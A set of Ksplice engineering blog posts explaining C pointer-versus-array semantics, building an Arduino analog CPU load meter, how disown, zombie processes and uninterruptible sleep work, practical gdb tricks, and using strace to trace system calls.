Tuesday Oct 18, 2011

The Ksplice Pointer Challenge

Back when Ksplice was just a research project at MIT, we all spent a lot of time around the student computing group, SIPB. While there, several precocious undergrads kept talking about how excited they were to take 6.828, MIT's operating systems class.

"You really need to understand pointers for this class," we cautioned them. "Reread K&R Chapter 5, again." Of course, they insisted that they understood pointers and didn't need to. So we devised a test.

Ladies and gentlemen, I hereby do officially present the Ksplice Pointer Challenge, to be answered without the use of a computer:

What does this program print?

#include <stdio.h>
int main() {
  int x[5];
  printf("%p\n", x);
  printf("%p\n", x+1);
  printf("%p\n", &x);
  printf("%p\n", &x+1);
  return 0;
}

This looks simple, but it captures a surprising amount of complexity. Let's break it down.

To make this concrete, let's assume that x is stored at address 0x7fffdfbf7f00 (this is a 64-bit system). Before reading each answer, I'd encourage you to work out for yourself what the line should output.

printf("%p\n", x);
What will this print?

Well, x is an array, right? You're no stranger to array syntax: x[i] accesses the ith element of x.

If we search back in the depths of our memory, we remember that x[i] can be rewritten as *(x+i). For that to work, x must be the memory location of the start of the array.

Result: printf("%p\n", x) prints 0x7fffdfbf7f00. Alright.

printf("%p\n", x+1);
What will this print?

So, x is 0x7fffdfbf7f00, and therefore x+1 should be 0x7fffdfbf7f01, right?

You're not fooled. You remember that in C, pointer arithmetic is special and magical. If you have a pointer p to an int, p+1 actually adds sizeof(int) to p. It turns out that we need this behavior if *(x+i) is properly going to end up pointing us at the right place -- we need to move over enough to pass one entry in the array. In this case, sizeof(int) is 4.

Result: printf("%p\n", x+1) prints 0x7fffdfbf7f04. So far so good.

printf("%p\n", &x);
What will this print?

Well, let's see. & basically means "the address of", so this is like asking "Where does x live in memory?" We answered that earlier, didn't we? x lives at 0x7fffdfbf7f00, so that's what this should print.

But hang on a second... if &x is 0x7fffdfbf7f00, that means that it lives at 0x7fffdfbf7f00. But when we print x, we also get 0x7fffdfbf7f00. So x == &x.

How can that possibly work? If x is a pointer that lives at 0x7fffdfbf7f00, and also points to 0x7fffdfbf7f00, where is the actual array stored?

Thinking about that, I draw a picture like this:

[diagram: a pointer stored at 0x7fffdfbf7f00 whose value is 0x7fffdfbf7f00, pointing back at itself]

That can't be right.

So what's really going on here? Well, first off, anyone who ever told you that a pointer and an array were the same thing was lying to you. That's our fallacy here. If x were a pointer, and x == &x, then yes, we would have something like the picture above. But x isn't a pointer -- x is an array!

And it turns out that in certain situations, an array can automatically "decay" into a pointer. Into &x[0], to be precise. That's what's going on in examples 1 and 2. But not here. So &x does indeed print the address of x.

Result: printf("%p\n", &x) prints 0x7fffdfbf7f00.

Aside: what is the type of &x[0]? Well, x[0] is an int, so &x[0] is "pointer to int". That feels right.

printf("%p\n", &x+1);
What will this print?

Ok, now for the coup de grace. x may be an array, but &x is definitely a pointer. So what's &x+1?

First, another aside: what is the type of &x? Well... &x is a pointer to an array of 5 ints. How would you declare something like that?

Let's fire up cdecl and find out:

cdecl> declare y as array 5 of int;
int y[5]
cdecl> declare y as pointer to array 5 of int;
int (*y)[5]

Confusing syntax, but it works:
int (*y)[5] = &x; compiles without error and works the way you'd expect.

But back to the question at hand. Pointer arithmetic tells us that &x+1 is going to be the address of x + sizeof(x). What's sizeof(x)? Well, it's an array of 5 ints. On this system, each int is 4 bytes, so it should be 20 bytes, or 0x14.

Result: printf("%p\n", &x+1) prints 0x7fffdfbf7f14.

And thus concludes the Ksplice pointer challenge.

What's the takeaway? Arrays are not pointers (though they sometimes pretend to be!). More generally, C is subtle. Oh, and 6.828 students, if you're having trouble with Lab 5, it's probably because of a bug in your Lab 2.

P.S. If you're interested in hacking on low-level systems at a place where your backwards-and-forwards knowledge of C semantics will be more than just an awesome party trick, we're looking to hire kernel hackers for the Ksplice team.

We're based in beautiful Cambridge, Mass., though working remotely is definitely an option. Send me an email at waseem.daher@oracle.com with a resume and/or a github link if you're interested!

Monday Jun 27, 2011

Building a physical CPU load meter

I built this analog CPU load meter for my dev workstation:

Physical CPU load meter

All I did was drill a few holes into the CPU and probe the power supply lines...

Okay, I lied. This is actually a fun project that would make a great intro to embedded electronics, or a quick afternoon hack for someone with a bit of experience.

The parts

The main components are:

  • Current meter: I got this at MIT Swapfest. The scale printed on the face is misleading: the meter itself measures only about 600 microamps in each direction. (It's designed to be driven through an external circuit that scales the signal.) We can determine the actual current scale by connecting (in series) the analog meter, a variable resistor, and a digital multimeter, and driving them from a 5 volt power supply. This lets us adjust and reliably measure the current flowing through the analog meter.

  • Arduino: This little board has a 16 MHz processor, with direct control of a few dozen input/output pins, and a USB serial interface to a computer. In our project, it will take commands over USB and produce the appropriate amount of current to drive the meter. We're not even using most of the capabilities of the Arduino, but it's hard to beat as a platform for rapid development.

  • Resistor: The Arduino board is powered over USB; its output pins produce 5 volts for a logic 'high'. We want this 5 volt potential to push 600 microamps of current through the meter, according to the earlier measurement. Using Ohm's law we can calculate that we'll need a resistance of about 8.3 kilohms. Or you can just measure the variable resistor from earlier.

We'll also use some wire, solder, and tape.

Building it

The resistor goes in series with the meter. I just soldered it directly to the back:

Back of the meter

Some tape over these components prevents them from shorting against any of the various junk on my desk. Those wires run to the Arduino, hidden behind my monitor, which is connected to the computer by USB:

The Arduino

That's it for hardware!

Code for the Arduino

The Arduino IDE will compile code written in a C-like language and upload it to the Arduino board over USB. Here's our program:

#define DIRECTION 2
#define MAGNITUDE 3

void setup() {
    pinMode(DIRECTION, OUTPUT);
    pinMode(MAGNITUDE, OUTPUT);
    Serial.begin(57600);
}

void loop() {
    int x = Serial.read();
    if (x == -1)
        return;

    if (x < 128) {
        digitalWrite(DIRECTION, LOW);
        analogWrite(MAGNITUDE, 2*(127 - x));
    } else {
        digitalWrite(DIRECTION, HIGH);
        analogWrite(MAGNITUDE, 255 - 2*(x - 128));
    }
}
When it turns on, the Arduino will execute setup() once, and then call loop() over and over, forever. On each iteration, we try to read a byte from the serial port. A value of -1 indicates that no byte is available, so we return and try again a moment later. Otherwise, we translate a byte value between 0 and 255 into a meter deflection between −600 and 600 microamps.

Pins 0 and 1 are used for serial communication, so I connected the meter to pins 2 and 3, and named them DIRECTION and MAGNITUDE respectively. When we call analogWrite on the MAGNITUDE pin with a value between 0 and 255, we get a proportional voltage between 0 and 5 volts. Actually, the Arduino fakes this by alternating between 0 and 5 volts very rapidly, but our meter is a slow mechanical object and won't know the difference.

Suppose the MAGNITUDE pin is at some intermediate voltage between 0 and 5 volts. If the DIRECTION pin is low (0 V), conventional current will flow from MAGNITUDE to DIRECTION through the meter. If we set DIRECTION high (5 V), current will flow from DIRECTION to MAGNITUDE. So we can send current through the meter in either direction, and we can control the amount of current by controlling the effective voltage at MAGNITUDE. This is all we need to make the meter display whatever reading we want.

Code for the Linux host

On Linux we can get CPU load information from the proc special filesystem:

keegan@lyle$ head -n 1 /proc/stat
cpu  965348 22839 479136 88577774 104454 5259 24633 0 0

These numbers tell us how much time the system's CPUs have spent in each of several states:

  1. user: running normal user processes
  2. nice: running user processes of low priority
  3. system: running kernel code, often on behalf of user processes
  4. idle: doing nothing because all processes are sleeping
  5. iowait: doing nothing because all runnable processes are waiting on I/O devices
  6. irq: handling asynchronous events from hardware
  7. softirq: performing tasks deferred by irq handlers
  8. steal: not running, because we're in a virtual machine and some other VM is using the physical CPU
  9. guest: acting as the host for a running virtual machine

The numbers in /proc/stat are cumulative totals since boot, measured in arbitrary time units. We can read the file twice and subtract, in order to get a measure of where CPU time was spent recently. Then we'll use the fraction of time spent in states other than idle as a measure of CPU load, and send this to the Arduino.

We'll do all this with a small Python script. The pySerial library lets us talk to the Arduino over USB serial. We'll configure it for 57,600 bits per second, the same rate specified in the Arduino's setup() function. Here's the code:

#!/usr/bin/env python

import serial
import time

port = serial.Serial('/dev/ttyUSB0', 57600)

old = None
while True:
    with open('/proc/stat') as stat:
        new = map(float, stat.readline().strip().split()[1:])
    if old is not None:
        diff = [n - o for n, o in zip(new, old)]
        idle = diff[3] / sum(diff)
        port.write(chr(int(255 * (1 - idle))))
    old = new
    time.sleep(0.25)  # poll a few times a second

That's it!

That's all it takes to make a physical, analog CPU meter. It's been done before and will be done again, but we're interested in what you'd do (or have already done!) with the concept. You could measure website hits, or load across a whole cluster, or your profits from trading Bitcoins. One standard Arduino can run at least six meters of this type (being the number of pins which support analogWrite), and a number of switches, knobs, buzzers, and blinky lights besides. If your server room has a sweet control panel, we'd love to see a picture!


Wednesday Mar 16, 2011

disown, zombie children, and the uninterruptible sleep

PID 1 Riding, by Albrecht Dürer

It's the end of the day on Friday. On your laptop, in an ssh session on a work machine, you check on long.sh, which has been running all day and has another 8 or 9 hours to go. You start to close your laptop.

You freeze for a second and groan.

This was supposed to be running under a screen session. You know that if you kill the ssh connection, that'll also kill long.sh. What are you going to do? Leave your laptop for the weekend? Kill the job, losing the last 8 hours of work?

You think about what long.sh does for a minute, and breathe a sigh of relief. The output is written to a file, so you don't care about terminal output. This means you can use disown.

How does this little shell built-in let your jobs finish even when you kill the parent process (the shell inside the ssh connection)?

Dissecting disown

As we'll see, disown synthesizes 3 big UNIX concepts: signals, process states, and job control.

The point of disowning a process is that it will continue to run even when you exit the shell that spawned it. Getting this to work requires a prelude. The steps are:

  1. suspend the process with Ctl-z.
  2. background with bg.
  3. disown the job.

What does each of these steps accomplish?

First, here's a summary of the states that a process can be in, from the ps man page:

       Here are the different values that the s, stat and state output specifiers (header "STAT" or "S")
       will display to describe the state of a process.
       D    Uninterruptible sleep (usually IO)
       R    Running or runnable (on run queue)
       S    Interruptible sleep (waiting for an event to complete)
       T    Stopped, either by a job control signal or because it is being traced.
       W    paging (not valid since the 2.6.xx kernel)
       X    dead (should never be seen)
       Z    Defunct ("zombie") process, terminated but not reaped by its parent.

       For BSD formats and when the stat keyword is used, additional characters may be displayed:
       <    high-priority (not nice to other users)
       N    low-priority (nice to other users)
       L    has pages locked into memory (for real-time and custom IO)
       s    is a session leader
       l    is multi-threaded (using CLONE_THREAD, like NPTL pthreads do)
       +    is in the foreground process group

And here is a transcript of the steps to disown long.sh. After each step is some useful ps output, in particular the parent process id (PPID), what process state our long job is in (STAT), and the controlling terminal (TT). Watch how these three change as we go:

The disown steps run in shell 1; the ps monitoring runs in shell 2.
1. Start program
$ sh long.sh
$ ps -o pid,ppid,stat,tty,cmd $(pgrep -f long)
26298 26145 S+   pts/0    sh long.sh
2. Suspend program with Ctl-z
[1]+  Stopped     sh long.sh
$ ps -o pid,ppid,stat,tty,cmd $(pgrep -f long)
26298 26145 T    pts/0    sh long.sh
3. Resume program in background
$ bg
[1]+ sh long.sh &
$ ps -o pid,ppid,stat,tty,cmd $(pgrep -f long)
26298 26145 S    pts/0    sh long.sh
4. disown job 1, our program
$ disown %1
$ ps -o pid,ppid,stat,tty,cmd $(pgrep -f long)
26298 26145 S    pts/0    sh long.sh
5. Exit the shell
$ exit
$ ps -o pid,ppid,stat,tty,cmd $(pgrep -f long)
26298     1 S    ?        sh long.sh

Putting this information together:

  1. When we run long.sh from the command line, its parent is the shell (PID 26145 in this example). Even though it looks like it is running as we watch it in the terminal, it mostly isn't; long.sh is waiting on some resource or event, so it is in process state S for interruptible sleep. It is in fact in the foreground, so it also gets a +.
  2. First, we suspend the program with Ctl-z. By ``suspend'', we mean send it the SIGTSTP signal, which is like SIGSTOP except that you can install your own signal handler for or ignore it. We see proof in the state change: it's now in T for stopped.
  3. Next, bg sets our process running again, but in the background, so we get the S for interruptible sleep, but no +.
  4. Finally, we can use disown to remove the process from the jobs list that our shell maintains. Our process has to be active when it is removed from the list or it'll get reaped when we kill the parent shell, which is why we needed the bg step.
  5. When we exit the shell, we are sending it a SIGHUP, which it propagates to all children in the jobs table**. By default, a SIGHUP will terminate a process. Because we removed our job from the jobs table, it doesn't get the SIGHUP and keeps on running (STAT S). However, since its parent the shell died, and the shell was the session leader in charge of the controlling tty, it doesn't have a tty anymore (TT ?). Additionally, our long job needs a new parent, so init, with PID 1, becomes the new parent process.
**This is not always true, as it turns out. In the bash shell, for example, there is a huponexit shell option. If this option is disabled, a SIGHUP to the shell isn't propagated to the children. This means if you have a backgrounded, active process (you followed steps 1, 2, and 3 above, or you started the process backgrounded with ``&'') and you exit the shell, you don't have to use disown for the process to keep running. You can check or toggle the huponexit shell option with the shopt shell built-in.

And that is disown in a nutshell.

What else can we learn about process states?

Dissecting disown presents enough interesting tangents about signals, process states, and job control for a small novel. Focusing on process states for this post, here are a few such tangents:

1. There are a lot of process states and modifiers. We saw some interruptible sleeps and suspended processes with disown, but what states are most common?

Using my laptop as a data source and taking advantage of ps format specifiers, we can get counts for the different process states:

jesstess@aja:~$ ps -e h -o stat | sort | uniq -c | sort -rn
     90 S
     31 Sl
     17 Ss
      9 Ss+
      8 Ssl
      4 S<
      3 S+
      2 SNl
      1 S<sl
      1 S<s
      1 SN
      1 SLl
      1 R+

So the vast majority are in an interruptible sleep (S), and a few processes are extra nice (N) and extra mean (<).

We can drill down on process ``niceness'', or scheduling priority, with the ni format specifier to ps:

jesstess@aja:~$ ps -e h -o ni | sort -n | uniq -c
      1 -11
      2  -5
      1  -4
      2  -2
      4   -
    156   0
      1   1
      1   5
      1  10

The numbers range from 19 (super friendly, low scheduling priority) to -20 (a total bully, high scheduling priority). The 6 processes with negative numbers are the 6 with a < process state modifier in the ``ps -e h -o stat'' output, and the 3 with positive numbers have the Ns. Most processes don't run under a special scheduling priority.

Why is almost nothing actually running?

In the ``ps -e h -o stat'' output above, only 1 process was marked as R running or runnable. This is a multi-processor machine, and there are over 150 other processes, so why isn't something running on the other processor?

The answer is that on an unloaded system, most processes really are waiting on an event or resource, so they can't run. On the laptop where I ran these tests, uptime tells us that we have a load average under 1:

jesstess@aja:~$ uptime
 13:09:10 up 16 days, 14:09,  5 users,  load average: 0.92, 0.87, 0.82

So we'd only expect to see 1 process in the R state at any given time for that load.

If we hop over to a more loaded machine -- a shell machine at MIT -- things are a little more interesting:

dr-wily:~> ps -e -o stat,cmd | awk '{if ($1 ~/R/) print}'
R+   /mit/barnowl/arch/i386_deb50/bin/barnowl.real.zephyr3
R+   ps -e -o stat,cmd
R+   w
dr-wily:~> uptime
 23:23:16 up 22 days, 20:09, 132 users,  load average: 3.01, 3.66, 3.43
dr-wily:~> grep processor /proc/cpuinfo
processor	: 0
processor	: 1
processor	: 2
processor	: 3

The machine has 4 processors. On average, 3 or 4 processors have processes running (in the R state). To get a sense of how the running processes change over time, throw the ps line under watch:

watch -n 1 "ps -e -o stat,cmd | awk '{if (\$1 ~/R/) print}'"

We get something like:

watching the changing output of ps

2. What about the zombies?

Noticeably absent in the process state summaries above are zombie processes (STAT Z) and processes in uninterruptible sleep (STAT D).

A process becomes a zombie when it has completed execution but hasn't been reaped by its parent. If a program produces long-lived zombies, this is usually a bug; zombies are undesirable because they take up process IDs, which are a limited resource.

I had to dig around a bit to find real examples of zombies. The winners were old barnowl zephyr clients (zephyr is a popular instant messaging system at MIT):

jesstess@linerva:~$ ps -e h -o stat,cmd | awk '{if ($1 ~/Z/) print}'
Z+   [barnowl] <defunct>
Z+   [barnowl] <defunct>

However, since all it takes to produce a zombie is a child exiting without the parent reaping it, it's easy to construct our own zombies of limited duration:

jesstess@aja:~$ cat zombie.c 
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>

int main() {
    pid_t child_pid = fork();
    if (child_pid > 0) {
        sleep(60);   /* parent: stick around while the child goes unreaped */
    } else {
        exit(0);     /* child: exit immediately and become a zombie */
    }
    return 0;
}
jesstess@aja:~$ gcc -o zombie zombie.c
jesstess@aja:~$ ./zombie
[1]+  Stopped                 ./zombie
jesstess@aja:~$ ps -o stat,cmd $(pgrep -f zombie)
T    ./zombie
Z    [zombie] <defunct>

When you run this program, the parent exits after 60 seconds, init becomes the zombie child's new parent, and init quickly reaps the child by making a wait system call on the child's PID, which removes it from the system process table.

3. What about the uninterruptible sleeps?

A process is put in an uninterruptible sleep (STAT D) when it needs to wait on something (typically I/O) and shouldn't be handling signals while waiting. This means you can't kill it, because all kill does is send it signals. This might happen in the real world if you unplug your NFS server while other machines have open network connections to it.

We can create our own uninterruptible processes of limited duration by taking advantage of the vfork system call. vfork is like fork, except the address space is not copied from the parent into the child, in anticipation of an exec which would just throw out the copied data. Conveniently for us, when you vfork, the parent waits uninterruptibly (by way of wait_for_completion) on the child's exec or exit:

jesstess@aja:~$ cat uninterruptible.c 
#include <sys/types.h>
#include <unistd.h>

int main() {
    pid_t pid = vfork();
    if (pid == 0) {
        sleep(60);   /* child: sleep while the parent waits in D state */
        _exit(0);    /* must _exit: returning would clobber the parent's stack */
    }
    return 0;
}
jesstess@aja:~$ gcc -o uninterruptible uninterruptible.c
jesstess@aja:~$ echo $$
13291
jesstess@aja:~$ ./uninterruptible

and in another shell:

jesstess@aja:~$ ps -o ppid,pid,stat,cmd $(pgrep -f uninterruptible)
13291  1972 D+   ./uninterruptible
 1972  1973 S+   ./uninterruptible

We see the child (PID 1973, PPID 1972) in an interruptible sleep and the parent (PID 1972, PPID 13291 -- the shell) in an uninterruptible sleep while it waits for 60 seconds on the child.

One neat (mischievous?) thing about this program is that processes in an uninterruptible sleep contribute to the load average for a machine. So you could run it 100 times to temporarily give a machine a load average elevated by 100, as reported by uptime.

It's a family affair

Signals, process states, and job control offer a wealth of opportunities for exploration on a Linux system: we've already disowned children, killed parents, witnessed adoption (by init), crafted zombie children, and more. If this post inspires fun tangents or fond memories, please share in the comments!

*Albrecht had some help from Adam and Photoshop Elements. Larger version here.
Props to Nelson for his boundless supply of sysadmin party tricks, which includes this vfork example.


Monday Jan 24, 2011

8 gdb tricks you should know

Despite its age, gdb remains an amazingly versatile and flexible tool, and mastering it can save you huge amounts of time when trying to debug problems in your code. In this post, I'll share 8 tips and tricks for using gdb to debug most efficiently.

I'll be using the Linux kernel for examples throughout this post, not because these examples are necessarily realistic, but because it's a large C codebase that I know and that anyone can download and take a look at. Don't worry if you aren't familiar with Linux's source in particular -- the details of the examples won't matter too much.

  1. break WHERE if COND

    If you've ever used gdb, you almost certainly know about the "break" command, which lets you break at some specified point in the debugged program.

    But did you know that you can set conditional breakpoints? If you add if CONDITION to a breakpoint command, you can include an expression to be evaluated whenever the program reaches that point, and the program will only be stopped if the condition is fulfilled. Suppose I was debugging the Linux kernel and wanted to stop whenever init got scheduled. I could do:

    (gdb) break context_switch if next == init_task

    Note that the condition is evaluated by gdb, not by the debugged program, so you still pay the cost of the target stopping and switching to gdb every time the breakpoint is hit. As such, conditional breakpoints still slow the target down in relation to how often the breakpoint's location is hit, not how often the condition is met.

  2. command

    In addition to conditional breakpoints, the command command lets you specify commands to be run every time you hit a breakpoint. This can be used for a number of things, but one of the most basic is to augment points in a program to include debug output, without having to recompile and restart the program. I could get a minimal log of every mmap() operation performed on a system using:

    (gdb) b do_mmap_pgoff 
    Breakpoint 1 at 0xffffffff8111a441: file mm/mmap.c, line 940.
    (gdb) command 1
    Type commands for when breakpoint 1 is hit, one per line.
    End with a line saying just "end".
    >print addr
    >print len
    >print prot
    >continue
    >end
  3. gdb --args

    This one is simple, but a huge timesaver if you didn't know it. If you just want to start a program under gdb, passing some arguments on the command line, you can just build your command-line like usual, and then put "gdb --args" in front to launch gdb with the target program and the argument list both set:

    [~]$ gdb --args pizzamaker --deep-dish --toppings=pepperoni
    (gdb) show args
    Argument list to give program being debugged when it is started is
      " --deep-dish --toppings=pepperoni".
    (gdb) b main
    Breakpoint 1 at 0x45467c: file oven.c, line 123.
    (gdb) run

    I find this especially useful if I want to debug a project that has some arcane wrapper script that assembles lots of environment variables and possibly arguments before launching the actual binary (I'm looking at you, libtool). Instead of trying to replicate all that state and then launch gdb, simply make a copy of the wrapper, find the final "exec" call or similar, and add "gdb --args" in front.

  4. Finding source files

    I run Ubuntu, so I can download debug symbols for most of the packages on my system from ddebs.ubuntu.com, and I can get source using apt-get source. But how do I tell gdb to put the two together? If the debug symbols include relative paths, I can use gdb's directory command to add the source directory to my source path:

    [~/src]$ apt-get source coreutils
    [~/src]$ sudo apt-get install coreutils-dbgsym
    [~/src]$ gdb /bin/ls
    GNU gdb (GDB) 7.1-ubuntu
    (gdb) list main
    1192    ls.c: No such file or directory.
        in ls.c
    (gdb) directory ~/src/coreutils-7.4/src/
    Source directories searched: /home/nelhage/src/coreutils-7.4:$cdir:$cwd
    (gdb) list main
    1192        }
    1193    }
    1195    int
    1196    main (int argc, char **argv)
    1197    {
    1198      int i;
    1199      struct pending *thispend;
    1200      int n_files;

    Sometimes, however, debug symbols end up with absolute paths, such as the kernel's. In that case, I can use set substitute-path to tell gdb how to translate paths:

    [~/src]$ apt-get source linux-image-2.6.32-25-generic
    [~/src]$ sudo apt-get install linux-image-2.6.32-25-generic-dbgsym
    [~/src]$ gdb /usr/lib/debug/boot/vmlinux-2.6.32-25-generic 
    (gdb) list schedule
    5519    /build/buildd/linux-2.6.32/kernel/sched.c: No such file or directory.
        in /build/buildd/linux-2.6.32/kernel/sched.c
    (gdb) set substitute-path /build/buildd/linux-2.6.32 /home/nelhage/src/linux-2.6.32/
    (gdb) list schedule
    5520    static void put_prev_task(struct rq *rq, struct task_struct *p)
    5521    {
    5522        u64 runtime = p->se.sum_exec_runtime - p->se.prev_sum_exec_runtime;
    5524        update_avg(&p->se.avg_running, runtime);
    5526        if (p->state == TASK_RUNNING) {
    5527            /*
    5528             * In order to avoid avg_overlap growing stale when we are
  5. Debugging macros

    One of the standard reasons almost everyone will tell you to prefer inline functions over macros is that debuggers tend to be better at dealing with inline functions. And in fact, by default, gdb doesn't know anything at all about macros, even when your project was built with debug symbols:

    (gdb) p GFP_ATOMIC
    No symbol "GFP_ATOMIC" in current context.
    (gdb) p task_is_stopped(&init_task)
    No symbol "task_is_stopped" in current context.

    However, if you're willing to tell GCC to generate debug symbols specifically optimized for gdb, using -ggdb3, it can preserve this information:

    $ make KCFLAGS=-ggdb3
    (gdb) break schedule
    (gdb) continue
    (gdb) p/x GFP_ATOMIC
    $1 = 0x20
    (gdb) p task_is_stopped_or_traced(init_task)
    $2 = 0

    You can also use the macro and info macro commands to work with macros from inside your gdb session:

    (gdb) macro expand task_is_stopped_or_traced(init_task)
    expands to: ((init_task->state & (4 | 8)) != 0)
    (gdb) info macro task_is_stopped_or_traced
    Defined at include/linux/sched.h:218
      included at include/linux/nmi.h:7
      included at kernel/sched.c:31
    #define task_is_stopped_or_traced(task) ((task->state & (__TASK_STOPPED | __TASK_TRACED)) != 0)

    Note that gdb actually knows which contexts macros are and aren't visible, so when you have the program stopped inside some function, you can only access macros visible at that point. (You can see that the "included at" lines above show you through exactly what path the macro is visible).

  6. gdb variables

    Whenever you print a variable in gdb, it prints this weird $NN = before it in the output:

    (gdb) p 5+5
    $1 = 10

    This is actually a gdb variable, that you can use to reference that same variable any time later in your session:

    (gdb) p $1
    $2 = 10

    You can also assign your own variables for convenience, using set:

    (gdb) set $foo = 4
    (gdb) p $foo
    $3 = 4

    This can be useful to grab a reference to some complex expression or similar that you'll be referencing many times, or, for example, for simplicity in writing a conditional breakpoint (see tip 1).

  7. Register variables

    In addition to the numeric variables, and any variables you define, gdb exposes your machine's registers as pseudo-variables, including some cross-architecture aliases for common ones, like $sp for the stack pointer, or $pc for the program counter or instruction pointer.

    These are most useful when debugging assembly code or code without debugging symbols. Combined with a knowledge of your machine's calling convention, for example, you can use these to inspect function parameters:

    (gdb) break write if $rdi == 2

    will break on all writes to stderr on amd64, where the $rdi register is used to pass the first parameter (here, the file descriptor).

  8. The x command

    Most people who've used gdb know about the print or p command, because of its obvious name, but I've been surprised how many don't know about the power of the x command.

    x (for "examine") is used to output regions of memory in various formats. It takes two arguments in a slightly unusual syntax:

    x/FMT ADDRESS

    ADDRESS, unsurprisingly, is the address to examine; it can be an arbitrary expression, like the argument to print.

    FMT controls how the memory should be dumped, and consists of (up to) three components:

    • A numeric COUNT of how many elements to dump
    • A single-character FORMAT, indicating how to interpret and display each element
    • A single-character SIZE, indicating the size of each element to display.

    x displays COUNT elements of length SIZE each, starting from ADDRESS, formatting them according to the FORMAT.

    There are many valid "format" arguments; help x in gdb will give you the full list, so here are just my favorites:

    x/x displays elements in hex, x/d displays them as signed decimals, x/c displays characters, x/i disassembles memory as instructions, and x/s interprets memory as C strings.

    The SIZE argument can be one of: b, h, w, and g, for one-, two-, four-, and eight-byte blocks, respectively.

    If you have debug symbols so that GDB knows the types of everything you might want to inspect, p is usually a better choice, but if not, x is invaluable for taking a look at memory.

    [~]$ grep saved_command /proc/kallsyms
    ffffffff81946000 B saved_command_line
    (gdb) x/s 0xffffffff81946000
    ffffffff81946000 <>:     "root=/dev/sda1 quiet"

    x/i is invaluable as a quick way to disassemble memory:

    (gdb) x/5i schedule
       0xffffffff8154804a <schedule>:   push   %rbp
       0xffffffff8154804b <schedule+1>: mov    $0x11ac0,%rdx
       0xffffffff81548052 <schedule+8>: mov    %gs:0xb588,%rax
       0xffffffff8154805b <schedule+17>:    mov    %rsp,%rbp
       0xffffffff8154805e <schedule+20>:    push   %r15

    If I'm stopped at a segfault in unknown code, one of the first things I try is something like x/20i $pc-40, to get a look at what the code I'm stopped at looks like.

    A quick-and-dirty but surprisingly effective way to debug memory leaks is to let the leak grow until it consumes most of a program's memory, and then attach gdb and just x random pieces of memory. Since the leaked data is using up most of memory, you'll usually hit it pretty quickly, and can try to interpret what it must have come from.


Ksplice is hiring!

Do you love tinkering with, exploring, and debugging Linux systems? Does writing Python clones of your favorite childhood computer games sound like a fun weekend project? Have you ever told a joke whose punch line was a git command?

Join Ksplice and work on technology that most people will tell you is impossible: updating the Linux kernel while it is running.

Help us develop the software and infrastructure to bring rebootless kernel updates to Linux, as well as new operating system kernels and other parts of the software stack. We're hiring backend, frontend, and kernel engineers. Say hello at jobs@ksplice.com!

Thursday Aug 05, 2010

Strace -- The Sysadmin's Microscope

Sometimes as a sysadmin the logfiles just don't cut it, and to solve a problem you need to know what's really going on. That's when I turn to strace -- the system-call tracer.

A system call, or syscall, is where a program crosses the boundary between user code and the kernel. Fortunately for us using strace, that boundary is where almost everything interesting happens in a typical program.

The two basic jobs of a modern operating system are abstraction and multiplexing. Abstraction means, for example, that when your program wants to read and write to disk it doesn't need to speak the SATA protocol, or SCSI, or IDE, or USB Mass Storage, or NFS. It speaks in a single, common vocabulary of directories and files, and the operating system translates that abstract vocabulary into whatever has to be done with the actual underlying hardware you have. Multiplexing means that your programs and mine each get fair access to the hardware, and don't have the ability to step on each other -- which means your program can't be permitted to skip the kernel, and speak raw SATA or SCSI to the actual hardware, even if it wanted to.

So for almost everything a program wants to do, it needs to talk to the kernel. Want to read or write a file? Make the open() syscall, and then the syscalls read() or write(). Talk on the network? You need the syscalls socket(), connect(), and again read() and write(). Make more processes? First clone() (inside the standard C library function fork()), then you probably want execve() so the new process runs its own program, and you probably want to interact with that process somehow, with one of wait4(), kill(), pipe(), and a host of others. Even looking at the clock requires a system call, clock_gettime(). Every one of those system calls will show up when we apply strace to the program.

In fact, just about the only thing a process can do without making a telltale system call is pure computation -- using the CPU and RAM and nothing else. As a former algorithms person, that's what I used to think was the fun part. Fortunately for us as sysadmins, very few real-life programs can go very long in that pure realm without having to deal with a file or the network or some other part of the system -- and then strace picks them up again.

Let's look at a quick example of how strace solves problems.

Use #1: Understand A Complex Program's Actual Behavior
One day, I wanted to know which Git commands take out a certain lock -- I had a script running a series of different Git commands, and it was failing sometimes when run concurrently because two commands tried to hold the lock at the same time.

Now, I love sourcediving, and I've done some Git hacking, so I spent some time with the source tree investigating this question. But this code is complex enough that I was still left with some uncertainty. So I decided to get a plain, ground-truth answer to the question: if I run "git diff", will it grab this lock?

Strace to the rescue. The lock is on a file called index.lock. Anything trying to touch the file will show up in strace. So we can just trace a command the whole way through and use grep to see if index.lock is mentioned:

$ strace git status 2>&1 >/dev/null | grep index.lock
open(".git/index.lock", O_RDWR|O_CREAT|O_EXCL, 0666) = 3
rename(".git/index.lock", ".git/index") = 0

$ strace git diff 2>&1 >/dev/null | grep index.lock

So git status takes the lock, and git diff doesn't.

Interlude: The Toolbox
To help make it useful for so many purposes, strace takes a variety of options to add or cut out different kinds of detail and help you see exactly what's going on.

In Medias Res, If You Want
Sometimes we don't have the luxury of starting a program over to run it under strace -- it's running, it's misbehaving, and we need to find out what's going on. Fortunately strace handles this case with ease. Instead of specifying a command line for strace to execute and trace, just pass -p PID where PID is the process ID of the process in question -- I find pstree -p invaluable for identifying this -- and strace will attach to that program, while it's running, and start telling you all about it.

When I use strace, I almost always pass the -tt option. This tells me when each syscall happened -- -t prints it to the second, -tt to the microsecond. For system administration problems, this often helps a lot in correlating the trace with other logs, or in seeing where a program is spending too much time.

For performance issues, the -T option comes in handy too -- it tells me how long each individual syscall took from start to finish.

By default strace already prints the strings that the program passes to and from the system -- filenames, data read and written, and so on. To keep the output readable, it cuts off the strings at 32 characters. You can see more with the -s option -- -s 1024 makes strace print up to 1024 characters for each string -- or cut out the strings entirely with -s 0.

Sometimes you want to see the full data flowing in just a few directions, without cluttering your trace with other flows of data. Here the options -e read= and -e write= come in handy.

For example, say you have a program talking to a database server, and you want to see the SQL queries, but not the voluminous data that comes back. The queries and responses go via write() and read() syscalls on a network socket to the database. First, take a preliminary look at the trace to see those syscalls in action:

$ strace -p 9026
Process 9026 attached - interrupt to quit
read(3, "\1\0\0\1\1A\0\0\2\3def\7youtomb\tartifacts\ta"..., 16384) = 116
poll([{fd=3, events=POLLIN|POLLPRI}], 1, 0) = 0 (Timeout)
write(3, "0\0\0\0\3SELECT timestamp FROM artifa"..., 52) = 52
read(3, "\1\0\0\1\1A\0\0\2\3def\7youtomb\tartifacts\ta"..., 16384) = 116
poll([{fd=3, events=POLLIN|POLLPRI}], 1, 0) = 0 (Timeout)
write(3, "0\0\0\0\3SELECT timestamp FROM artifa"..., 52) = 52

